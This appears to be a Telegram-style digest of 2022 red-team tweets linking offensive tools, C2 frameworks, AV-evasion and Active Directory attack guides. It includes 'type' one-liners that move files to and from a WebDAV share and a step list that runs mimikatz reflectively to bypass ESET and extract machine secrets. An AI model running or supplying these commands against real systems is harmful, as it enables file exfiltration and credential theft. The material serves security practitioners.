😈 [ Mr_0rng, mr.0range ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
😈 [ netbiosX, netbiosX 🦄 ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
😈 [ m2rc_p, marc ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
Forwarded from Внутрянка
Article about shadow credentials
Ardent101
Kerberos for the penetration tester. Part 6. PKINIT
The article covers the design of one of the Kerberos protocol extensions, PKINIT. After a theoretical introduction, it walks through attack techniques related to this extension, in particular Shadow Credentials and UnPAC the hash.
In short, …
😈 [ c2_matrix, C2 Matrix | #C2Matrix ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
😈 [ r3dy__, Royce Davis ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
This is the infrastructure lab from here, by the way: https://livebook.manning.com/book/penetrating-enterprise-networks (decent generic material on internal pentests)
😈 [ Flangvik, Melvin langvik ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec have been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
😈 [ chompie1337, chompie ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
😈 [ pdiscoveryio, ProjectDiscovery.io ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
😈 [ 424f424f, rvrsh3ll ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
😈 [ 404death, sailay(valen) ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for contributing to The Hacker Tools, documenting Impacket's ping, ping6, GetNPUsers and GetUserSPNs example scripts
- https://t.co/h3gTvWV4ia
- https://t.co/PRR2wdZkcT
- https://t.co/tApF0oAmBx
- https://t.co/GM1yyW78sF
https://t.co/PjOo8FoZ0p
🔗 https://tools.thehacker.recipes/impacket/examples/ping.py
🔗 https://tools.thehacker.recipes/impacket/examples/ping6.py
🔗 https://tools.thehacker.recipes/impacket/examples/getnpusers.py
🔗 https://tools.thehacker.recipes/impacket/examples/getuserspns.py
🔗 https://tools.thehacker.recipes/impacket/examples
🐥 [ tweet ]
😈 [ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Here's all the nighthawk samples which mdsec tried to hide by blasting VT with fake samples. Enjoy hunting TAs! Sharing for attribution purposes!
https://t.co/Nrlr6CU7TF
https://t.co/7V8r5QObeP
https://t.co/lWNZctPTy8
https://t.co/aIg3QecyTg
https://t.co/ERvg61wELk
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.
🧑🍳 The Hacker Recipes https://t.co/iMrOGWv63j
🔗 https://www.thehacker.recipes/ad/movement/dacl
🐥 [ tweet ]
😈 [ OutflankNL, Outflank ]
New BOF released to our OST customers: Coercer
Coercer triggers a novel and non-public coercion method that forces SMB authentication from the computer account on workstations. From there on, you can for example relay to ADCS for generating a computer certificate.
🐥 [ tweet ]
😈 [ _RastaMouse, Rasta Mouse ]
[BLOG]
Short post on alternate ways to impersonate access tokens in C#, including in other threads. Thanks @GuhnooPlusLinux for providing the inspiration.
https://t.co/TRdI5zuR5j
🔗 https://rastamouse.me/token-impersonation-in-csharp/
🐥 [ tweet ]
😈 [ 0xdf_, 0xdf ]
Support is the 4th box I've released on @hackthebox_eu! It retires today. Light .NET reversing, LDAP enumeration, and genericall on the DC -> a fake machine AD attack.
Inspiration for the box comes from a @7minsec "tales of pentest pwnage" episode.
https://t.co/79G4EUS7Nt
🔗 https://0xdf.gitlab.io/2022/12/17/htb-support.html
🐥 [ tweet ]
😈 [ Idov31, Ido Veltzman ]
I'm happy to release Venom - A C++ single header file for evasive network communication which uses a stolen browser's socket to perform all of its network activities and by that can make it hard to trace it back to the process.
https://t.co/AVxQbNru3Z
#infosec #CyberSecurity
🔗 https://github.com/Idov31/Venom
🐥 [ tweet ]
😈 [ an0n_r0, an0n ]
1. remove disk from target laptop
2. virtualize system (VBoxManage convertfromraw)
3. abuse local admin (chntpw using alt booted system)
4. run mimikatz by reflective loading (bypass ESET :) )
5. extract machine cert / secrets
NEVER deploy company laptop without BitLocker.
🐥 [ tweet ]